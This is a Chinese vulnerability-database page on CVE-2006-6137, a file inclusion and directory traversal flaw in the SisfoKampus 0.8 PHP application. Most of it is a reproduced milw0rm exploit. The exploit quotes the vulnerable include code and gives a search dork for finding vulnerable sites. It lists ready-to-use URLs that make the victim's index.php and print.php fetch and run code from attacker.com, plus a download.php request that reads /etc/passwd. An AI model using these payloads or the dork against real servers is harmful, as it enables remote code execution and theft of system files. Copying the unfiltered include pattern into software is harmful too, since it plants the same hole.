Sisfo Kampus文件包含及目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111668 漏洞类型 输入验证
发布时间 2006-11-25 更新时间 2006-11-28
CVE编号 CVE-2006-6137 CNNVD-ID CNNVD-200611-430
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2847
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-430
|漏洞详情
SisfoKampus是一款系统信息管理系统。SisfoKampus在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。SisfoKampus的index.php和print.php脚本没有过滤slnt参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。
|漏洞EXP
#       Source Code = Sisfokampus 0.8
#
#       Website = www.Sisfokampus.net
#
#       Author = E. Setio Dewo (setio_dewo@telkom.net)
#
#       Dorkz : Allinurl: /index.php?exec=


#       File Vuln :     index.php
#                       print.php
#                       download.php ( Local File Include )
#
#       Found by :      Wawan Firmansyah a.k.a Ang|n
                        angkaramurka2003@yahoo.com

###############################################################################

# Source of index.php

       -------------------------[Line 27]-----------------------------
       <?php
          if ($exec=='main.php' && file_exists("$themedir/main.php"))
               include "$themedir/main.php";
               else include $exec;
       ?>
       -------------------------[Line 31]------------------------------

# Source Of print.php

       -------------------------[Line 15]------------------------------
       <?php
       include_once "sysfo/sysfo.common.php";

       if (isset($_REQUEST['print'])) {
       $print = $_REQUEST['print'];
       include "$print";
       }
       else die (DisplayHeader($fmtErrorMsg, $strNoDataTobePrint));

       include "disconnectdb.php";
       ?>
       -------------------------[Line 25]-------------------------------

# Source Of download.php

       -------------------------[Line 1]--------------------------------
       <?php
       DisplayHeader($fmtPageTitle, $strDownload);
       include "lib/file.common.php";
       if (isset($_REQUEST['dir'])) $dir = $_REQUEST['dir'];
       else $dir = $Download_dir;
       if (substr($dir, -1) != '/' && substr($dir, -1) != '\\') $dir = "$dir/";
       DisplayDownloadDir($dir);
       ?>
       -------------------------[Line 8]--------------------------------

##################################################################################

# Exploit of index.php

       http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?

# Exploit of print.php
       http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
       or
       http://www.victim.com/index.php?exec=print&print=http://attacker.com/evilcode.txt?

# Exploit of download.php

       http://www.victim.com/index.php?exec=download&dir=/etc/passwd

##################################################################################

Greatz :
       K-159 ( Thanks for ur Support & Advice )
       #cyberbox community in dal.net
       #indolinux in dal.net
       #edp in dal.net

##################################################################################

# milw0rm.com [2006-11-25]
|参考资料

来源:BID
名称:21294
链接:http://www.securityfocus.com/bid/21294
来源:MILW0RM
名称:2847
链接:http://www.milw0rm.com/exploits/2847
来源:MILW0RM
名称:2847
链接:http://milw0rm.com/exploits/2847